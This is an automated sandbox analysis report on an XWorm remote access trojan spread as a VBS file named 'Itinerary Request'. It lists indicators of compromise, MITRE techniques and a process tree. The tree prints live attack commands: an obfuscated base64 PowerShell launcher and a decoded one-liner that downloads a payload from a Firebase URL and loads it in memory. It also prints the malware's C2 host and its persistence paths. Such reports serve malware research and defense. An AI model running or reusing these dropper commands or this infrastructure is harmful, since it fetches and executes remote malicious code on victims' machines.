xworm | hxxps://drive[.]google[.]com/file/d/1ujWZUijtSNleX-CVAmIFu_mP1gIYi4My/view?usp=drive_web

Analysis

max time kernel
209s
max time network
211s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags

arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system
submitted
31-07-2024 21:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/file/d/1ujWZUijtSNleX-CVAmIFu_mP1gIYi4My/view?usp=drive_web

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Extracted

Family

xworm

Version

5.0

BobbyMiller09.bumbleshrimp.com:1978

Mutex

nVTUMK4KGE9DKP3U

Attributes

Install_directory
%Temp%
install_file
XClient.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3992-134-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
77	3452	powershell.exe
79	2692	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	RegSvcs.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	RegSvcs.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1184	powershell.exe
3452	powershell.exe
4716	powershell.exe
2692	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
3	drive.google.com
5	drive.google.com
6	drive.google.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3452 set thread context of 3992	3452	powershell.exe	105
PID 2692 set thread context of 3608	2692	powershell.exe	113

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133669340582045416"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
4440	chrome.exe
4440	chrome.exe
1184	powershell.exe
1184	powershell.exe
1184	powershell.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
2056	powershell.exe
2056	powershell.exe
2056	powershell.exe
4716	powershell.exe
4716	powershell.exe
4716	powershell.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
1732	powershell.exe
1732	powershell.exe
1732	powershell.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
2692	powershell.exe
3480	chrome.exe
3480	chrome.exe
3480	chrome.exe
3480	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeDebugPrivilege	3992	RegSvcs.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe
Token: SeDebugPrivilege	3608	RegSvcs.exe
Token: SeShutdownPrivilege	4440	chrome.exe
Token: SeCreatePagefilePrivilege	4440	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe
4440	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4440 wrote to memory of 2756	4440	chrome.exe	83
PID 4440 wrote to memory of 2756	4440	chrome.exe	83
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 4640	4440	chrome.exe	85
PID 4440 wrote to memory of 1508	4440	chrome.exe	86
PID 4440 wrote to memory of 1508	4440	chrome.exe	86
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87
PID 4440 wrote to memory of 928	4440	chrome.exe	87

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://drive.google.com/file/d/1ujWZUijtSNleX-CVAmIFu_mP1gIYi4My/view?usp=drive_web
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd0b5cc40,0x7fffd0b5cc4c,0x7fffd0b5cc58
  2⤵
  PID:2756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,11039522296309217636,15278236557044247710,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=1852 /prefetch:2
  2⤵
  PID:4640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2044,i,11039522296309217636,15278236557044247710,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2100 /prefetch:3
  2⤵
  PID:1508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,11039522296309217636,15278236557044247710,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2456 /prefetch:8
  2⤵
  PID:928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,11039522296309217636,15278236557044247710,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3120 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,11039522296309217636,15278236557044247710,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:4032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,11039522296309217636,15278236557044247710,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=4408 /prefetch:1
  2⤵
  PID:1700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4748,i,11039522296309217636,15278236557044247710,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=4760 /prefetch:8
  2⤵
  PID:4792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4800,i,11039522296309217636,15278236557044247710,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=4996 /prefetch:1
  2⤵
  PID:4984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5236,i,11039522296309217636,15278236557044247710,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=5220 /prefetch:8
  2⤵
  PID:2728
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Itinerary Request.vbs"
  2⤵
  - Checks computer location settings
  PID:2336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bj▒GU▒dgBy▒Gc▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Bo▒GI▒bwB2▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒B1▒Hg▒YgBm▒GU▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒ZgBp▒HI▒ZQBi▒GE▒cwBl▒HM▒d▒Bv▒HI▒YQBn▒GU▒LgBn▒G8▒bwBn▒Gw▒ZQBh▒H▒▒aQBz▒C4▒YwBv▒G0▒LwB2▒D▒▒LwBi▒C8▒cgBv▒GQ▒cgBp▒GE▒awBk▒C0▒O▒▒0▒DE▒MwBk▒C4▒YQBw▒H▒▒cwBw▒G8▒d▒▒u▒GM▒bwBt▒C8▒bw▒v▒GQ▒b▒Bs▒CU▒MgBG▒GQ▒b▒Bs▒CU▒Mg▒w▒Eg▒bwBw▒GU▒LgB0▒Hg▒d▒▒/▒GE▒b▒B0▒D0▒bQBl▒GQ▒aQBh▒CY▒d▒Bv▒Gs▒ZQBu▒D0▒Ng▒x▒GM▒O▒▒y▒Dk▒Zg▒2▒C0▒ZQ▒x▒Dk▒Ng▒t▒DQ▒OQBl▒Dg▒LQBi▒DQ▒ZgBm▒C0▒M▒▒0▒DE▒MQ▒z▒DQ▒NQ▒3▒Dc▒ZgBm▒GU▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒HU▒e▒Bi▒GY▒ZQ▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒Zg▒w▒DE▒NwBk▒Dg▒Ng▒5▒Dk▒MQ▒x▒GQ▒LQ▒2▒D▒▒ZQ▒5▒C0▒N▒Bj▒Dk▒N▒▒t▒DM▒YgBm▒DU▒LQ▒2▒GU▒Nw▒4▒GI▒OQ▒0▒DE▒PQBu▒GU▒awBv▒HQ▒JgBh▒Gk▒Z▒Bl▒G0▒PQB0▒Gw▒YQ▒/▒HQ▒e▒B0▒C4▒awBu▒Gk▒b▒B5▒GQ▒Z▒B1▒GI▒LwBv▒C8▒bQBv▒GM▒LgB0▒G8▒c▒Bz▒H▒▒c▒Bh▒C4▒M▒▒4▒Dk▒Ng▒1▒C0▒ZQBw▒G8▒a▒▒v▒GI▒Lw▒w▒HY▒LwBt▒G8▒Yw▒u▒HM▒aQBw▒GE▒ZQBs▒Gc▒bwBv▒Gc▒LgBl▒Gc▒YQBy▒G8▒d▒Bz▒GU▒cwBh▒GI▒ZQBy▒Gk▒Zg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gg▒YgBv▒HY▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒YwBl▒HY▒cgBn▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Itinerary Request.vbs');powershell -command $KByHL;
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$cevrg = '034';$hbovx = 'C:\Users\Admin\Downloads\Itinerary Request.vbs';[Byte[]] $uxbfe = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($uxbfe).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('f017d869911d-60e9-4c94-3bf5-6e78b941=nekot&aidem=tla?txt.knilyddub/o/moc.topsppa.08965-epoh/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $hbovx , '_______________________-------------', $cevrg, '1', 'Roda' ));"
      4⤵
      Blocklisted process makes network request
      Drops startup file
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3452
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\Downloads\Itinerary Request.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2056
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3992
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Itinerary Request.vbs"
  2⤵
  - Checks computer location settings
  PID:4080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bj▒GU▒dgBy▒Gc▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Bo▒GI▒bwB2▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒B1▒Hg▒YgBm▒GU▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒ZgBp▒HI▒ZQBi▒GE▒cwBl▒HM▒d▒Bv▒HI▒YQBn▒GU▒LgBn▒G8▒bwBn▒Gw▒ZQBh▒H▒▒aQBz▒C4▒YwBv▒G0▒LwB2▒D▒▒LwBi▒C8▒cgBv▒GQ▒cgBp▒GE▒awBk▒C0▒O▒▒0▒DE▒MwBk▒C4▒YQBw▒H▒▒cwBw▒G8▒d▒▒u▒GM▒bwBt▒C8▒bw▒v▒GQ▒b▒Bs▒CU▒MgBG▒GQ▒b▒Bs▒CU▒Mg▒w▒Eg▒bwBw▒GU▒LgB0▒Hg▒d▒▒/▒GE▒b▒B0▒D0▒bQBl▒GQ▒aQBh▒CY▒d▒Bv▒Gs▒ZQBu▒D0▒Ng▒x▒GM▒O▒▒y▒Dk▒Zg▒2▒C0▒ZQ▒x▒Dk▒Ng▒t▒DQ▒OQBl▒Dg▒LQBi▒DQ▒ZgBm▒C0▒M▒▒0▒DE▒MQ▒z▒DQ▒NQ▒3▒Dc▒ZgBm▒GU▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒HU▒e▒Bi▒GY▒ZQ▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc